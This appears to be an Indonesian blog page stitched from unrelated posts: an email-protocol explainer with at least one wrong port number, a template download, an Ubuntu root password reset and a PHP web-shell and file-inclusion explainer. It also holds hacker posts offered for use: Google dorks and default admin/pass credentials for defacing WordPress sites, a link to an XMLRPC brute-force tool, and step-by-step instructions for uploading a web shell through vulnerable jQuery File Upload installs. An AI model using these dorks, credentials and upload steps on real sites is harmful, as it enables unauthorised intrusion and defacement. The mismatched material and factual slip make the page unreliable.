Pengertian SMTP, POP3, dan IMAP pada Layanan Email
Pengertian Protokol pada Email
Sebelum membahas SMTP, POP3 dan IMAP, Anda perlu mengetahui terlebih dahulu apa itu protokol.
Ketika komputer berkomunikasi dengan komputer lain, perlu adanya sebuah aturan dan instruksi yang diikuti oleh setiap komputer. Istilah ini dinamakan dengan protokol.
Protokol yang akan kami ulas di sini fungsinya berhubungan dengan pengiriman serta penerimaan email yaitu SMTP, POP3, dan IMAP. Di bawah ini adalah penjelasan dari masing-masing protokol tersebut.
Pengertian SMTP dan POP3
Sebelum masuk ke pembahasan IMAP, Anda akan mendapatkan penjelasan mengenai SMTP dan port defaultnya berikut.
Apa Itu SMTP?
Simple Mail Transfer Protocol atau SMTP adalah suatu protokol untuk berkomunikasi dengan server guna mengirimkan email dari lokal email ke server, sebelum akhirnya dikirimkan ke server email penerima. Proses ini dikontrol dengan Mail Transfer Agent (MTA) yang ada dalam server email Anda.
Port SMTP Default
- Port 25 – Port tanpa dienkripsi
- Port 426 – Port SSL/TLS, nama lainnya SMTPS
Pengertian POP3
POP3 (Post Office Protocol 3) adalah versi terbaru dari protokol standar untuk menerima email. POP3 merupakan protokol client/server dimana email dikirimkan dari server ke email lokal. Digunakan untuk berkomunikasi dengan email server dan mengunduh semua email ke email lokal (seperti Outlook, Thunderbird, Windows Mail, Mac Mail, dan sebagainya), tanpa menyimpan salinannya di server. Biasanya, dalam aplikasi email terdapat pilihan untuk tetap menyimpan salinan email yang diunduh pada server atau tidak.
Apabila Anda mengakses akun email yang sama dari perangkat berbeda, kami sangat merekomendasikan Anda untuk menyimpan backup. Hal ini perlu dilakukan sebagai langkah antisipasi, semisal perangkat kedua tidak mengunduh email, sementara perangkat pertama sudah menghapusnya.
POP3 adalah protokol komunikasi satu arah, yang artinya data diambil dari server dan dikirimkan ke email lokal di perangkat komputer Anda.
Port POP3 Default
- Port 110 – Port tanpa dienkripsi
- Port 995 – Port SSL/TLS, nama lainnya POP3S
Kelebihan Menggunakan POP3
- Ketika email sudah diunduh melalui aplikasi local mail di komputer, Anda tidak perlu terhubung ke internet apabila Anda ingin membukanya kembali.
- Kebanyakan tidak ada ukuran limit untuk email yang dikirim dan diterima.
- Dapat membuka file attachment dengan cepat .
- Tidak ada ukuran maksimal untuk mailbox, kecuali harddisk komputer Anda penuh.
Kekurangan Menggunakan POP3
- Jika JavaScript pada email reader diaktifkan, email phishing dengan embed JavaScript dapat terbaca di email.
- Semua pesan akan disimpan di komputer. Hal ini dapat mengurangi space pada harddisk komputer.
- Semua file attachment diunduh dan disimpan dalam komputer. Karenanya, potensi komputer terinfeksi virus dari email lebih besar.
- Folder email terkadang hilang. Jika ini yang terjadi, upaya restore cukup sulit dilakukan.
Pengertian IMAP dan Perbedaannya dengan POP3
IMAP (Internet Message Access Protocol), seperti halnya POP3, juga digunakan untuk mengirimkan email ke local mail, hanya saja terdapat sedikit perbedaan cara kerja.
IMAP adalah merupakan protokol komunikasi dua arah sebagai perubahan yang dibuat pada local mail yang dikirimkan ke server. Pada dasarnya, isi email tetap berada di server. Protokol IMAP lebih direkomendasikan oleh penyedia email seperti Gmail dibandingkan menggunakan POP3.
Dalam IMAP, email disimpan di server. ketika Anda akan mengecek email, local mail akan menghubungi server untuk menampilkan pesan email. Sehingga untuk file pesan email tetap berada di server dan tidak didownload ke email lokal.
Port IMAP Default
- Port 143 – Port tanpa dienkripsi
- Port 993 – Port SSL/TLS, nama lainnya IMAPS
Kelebihan Menggunakan IMAP
- Anda dapat mengakses email dari mana saja melalui perangkat berbeda.
- Email dapat diakses melalui web browser tanpa aplikasi email.
- Anda hanya mengunduh pesan yang ingin dibuka, sehingga tidak perlu menunggu semua pesan diunduh.
- Attachment tidak secara otomatis diunduh oleh IMAP, sehingga email dapat diakses lebih cepat. Anda juga dapat memilih attachment tertentu yang ingin Anda buka.
Banyaknya pengguna mobile dewasa ini mengakibatkan IMAP lebih banyak digunakan. Hal ini dikarenakan file dari pesan email tersimpan dalam server dan Anda hanya tinggal mengaksesnya saja.
Kekurangan Menggunakan IMAP
- Ada beberapa layanan hosting yang tidak mendukung IMAP.
- Email disimpan pada server sehingga mengurangi disk space hosting.
- Email dengan IMAP hanya dapat diakses ketika terkoneksi internet.
Kesimpulan
Kami berharap saat ini Anda lebih memahami tentang protokol pada email dan port yang digunakan dengan sedikit penjelasan mengenai pengertian SMTP, POP3 dan IMAP. Anda juga telah mengetahui bahwa POP3 maupun IMAP pada dasarnya memiliki fungsi yang sama, dan hanya memiliki sedikit perbedaan saja.
Dalam IMAP, konten email disimpan di server. Sementara itu, POP3 mengunduh semua email ke komputer. Di samping itu, kami juga telah membahas port default untuk SMTP, POP3 dan IMAP
Deface Wp Default
Halo Gan balik lagi sama Mimin
Kali ini Mimin bagi dork + xploit + exsk u&p
Langsung aja kg usah banyak ngetik cape gw
###############
Dork: intitle:"My Blog - My Wordpress Blog" site:.id
intitle:"Hello World " intext:2020
inurl:/wp/
intitle:"Wordpress" site:.id
User: admin
Password: pass
Xploit login: /[patch]/wp-login.php
/wp-login.php
/wp-admin/wp-login.php
Cukup kan...
Ya sudah Mimin offline dulu:(
Next time gusy....
TOOLS XMLRPC-BRUTEFORCE NEW VERSI x64_2_9_16
Halo balik lagi sama Mimin kali ini Mimin bakal kasih tools ngehex Yaitu Tools Xmlr-Pc BruteForce gunanya buat deface gusy oiya nih langsung aja Mimin kasih
Download Here:
https://www.mediafire.com/file/9s110u5ai8b7lgq/Xmlrpc.zip/file
Oiya gusy kalo mau Copas Artikel ini copas aja tapi titipkan Link web kami / refrensi biar kita juga ada kenaikan view๐๐คธ๐คธ wkwkwkkw
Ok kayaknya Mimin tidur dulu deh sudah malam Babay
Next Time --
Template Blogger XML Free | LinkMagz-v.1.8.0
Halo sobat blogger saya Hadid, kali ini saya bakalan bagi sesuatu ke temen temen nih... Apa hayo... Hehehehe sesuai di judul ya temen temen ๐
Jadi template blogger yang bernama LinkMagz dari versi pertama Sampai yang terbaru itu adalah andalan para blogger ya temen-temen selain mimin juga suka dengan template itu mimin bakalan bagi nih template LinkMagz-v.1.8.0, gak hanya 1 tema ya temen temen
Langsung aja yang mau download mimin kasih link nya nih, mimin baik kan๐๐ wkwkwkwkw
Download nya gak ribet kok kasihan klo pake redirect kebanyakan Mimin kasih yang simpel aja takutnya situ lagi buru buru๐
Download here:
https://drive.google.com/file/d/1h3jjiHLZEXdWRlHZOqNoRN1A9My0cANp/view
Ok linknya di atas ya..
Kayaknya sudah sampe sini dulu deh temen temen soalnya udah mau solat isya, wkwkwkw sudah dulu temen temen
Next time --
Deface Poc jQuery file upload (JFU)
[•]Deface jQuery file upload [•]
Time: Kamis,24, Desember
Author: HdID
Type: deface & xploiting
#################
Dork:
-"jQuery file Upload Demo jQuery file Upload"
-inurl: server/php/
Xploit: /server/php/
Vuln?: {"files":[]}
Csrf online :cari di google
#############################
1.DORKING DULU
2.KLO UDH NEMU LU KASIH EXPLOIT CONTOH (cominiweb.com/jQuery-file-upload/server/php (klo vuln bakal muncul {"files":[]} tapi gak mesti bisa up file!)
3.buka csrf masukin web lu trus post file lu isi ( files[] )
4. Lalu up sc/Shell lu
5.cara akses lu Tigal tambahin path di belakang web contoh /files/sc.php
Ok paham? Tq udh mampir
Cara Reset Password Root di Ubuntu ( OLD METHOD )
1. Pada saat boot pilih menu recover mode
2. Pada Recovery menu pilih root
3. Ketik perintah di bawah ini
1 2 3 4 5 6 7 | root@ubuntu:~# mount -o rw,remount / root@ubuntu:~# ls /home itengineering-id root@ubuntu:~# passwd itengineering-id Enter new UNIX password : Retype new UNIX password : passwd : password updated successfully |
Baris 1 : mounting ulang partisi root dengan menambah opsi read-write
Baris2 : melihat username yang terdapat pada ubuntu
Baris 4 : mengganti password dari musaamin
Baris 7 : informasi bahwa password telah dirubah
Selain di Ubuntu saya juga sudah mencobanya di BlankOn.
PHP Security : Shell Injection
Selain sql injection, salah satu jenis serangan lainnya yang perlu di ketahui dan diantisipasi bagi web developer adalah berupa web shell injection. Nah, apa itu Web shell injection ?
Web shell ini merupakan kumpulan script yang dapat mengeksekusi perintah shell. Setiap web shell bentuknya berbeda-beda tergantung dari web server itu sendiri. Misal, jika web servernya apache maka web shell nya berbentuk script PHP dan bentuk script shell nya dikenal dengan PHP shell injection.
PHP shell injection adalah sebuah tindakan untuk melakukan eksploitasi terhadap celah keamanan sebuah website dengan cara menginjeksi Shell hasil pengkodean bahasa PHP terhadap file yang terdapat pada website tersebut yang memiliki kelemahan ataupun kesalahan pemrograman/pengkodean
web-shell-php-injection
Contoh shell yang sudah jadi dan beredar di dunia maya, diantaranya yaitu :
b374k (indonesia)
dQ99-shell
c99 (rusia)
phpShell
itsecteam-shell
Bypass
safeOver
phpShell
itsecteam-shell
Tyrag-Bypass
c100
ASPx
CMD-aspshell
CWShell-Dumper
CGI-Shell
Cara menjalankan web shell, file tersebut harus di sisipkan terlebih dahulu di web server dalam direktori target. Salah satu, metode upload file adalah Remote File Inclusion atau dikenal dengan disingkat RFI.
Cerita singkat Remote File Inclusion. RFI merupakan metode untuk mengeksploitasi web dengan memanfaatkan file yang sudah ada pada file tersebut untuk mengeksekusi file yang diluar web.
Gambaran contoh sederhananya adalah sebagai berikut. Ada sebuah web yang proses eksekusinya menggunakan satu file yang memanggil file yang lain untuk melengkapinya melalui alamat web, seperti berikut :
http://www.target-web.com/?page=artikel.php
pada alamat diatas, tulisan artikel.php, adalah file php yang akan di masukan kedalam script php untuk di proses. kodenya bisa seperti ini.
<?php
$page=$_GET[“page”];
if($page==””){
include “home.php”;
}
include $page.”.php”;
?>
cerita selanjutnya perintah script php di artikel.php akan di eksekusi di dalam kode tersebut. permasalahan cara diatas adalah memungkinkan orang lain untuk memasukan kode selain artikel.php, isinya bebas.
Teman dari RFI adalah LFI atau Local File Inclusion, yaitu hampir sama dengan RFI, namun bedanya RFI memanfaatkan file diluar web, sedangkan LFI memanfaatkan file yang sudah tersimpan di internal server seperti file sistem /etc/passwd untuk untuk system operasi linux.
Bagaimana cara untuk melindungi web dari serangan RFI atau LFI ? antisipasi untuk menangkal serang ini diantaranya adalah dengan script yang terupdate, lalu pastikan php.ini register_globals dan allow_url_fopen dinonaktifkan.
Setelah berhasil di simpan di direktori server, maka hacker bisa memanggilnya dengan cara mengakses file tersebut melalui browser, contoh pemanggilannya :
http://www.target-web.com/c99.php
http://www.target-web.com/ — alamat domain target
c99.php — file php shell injection
Terlihat cukup mudah, namun butuh latihan untuk dapat melakukannya.















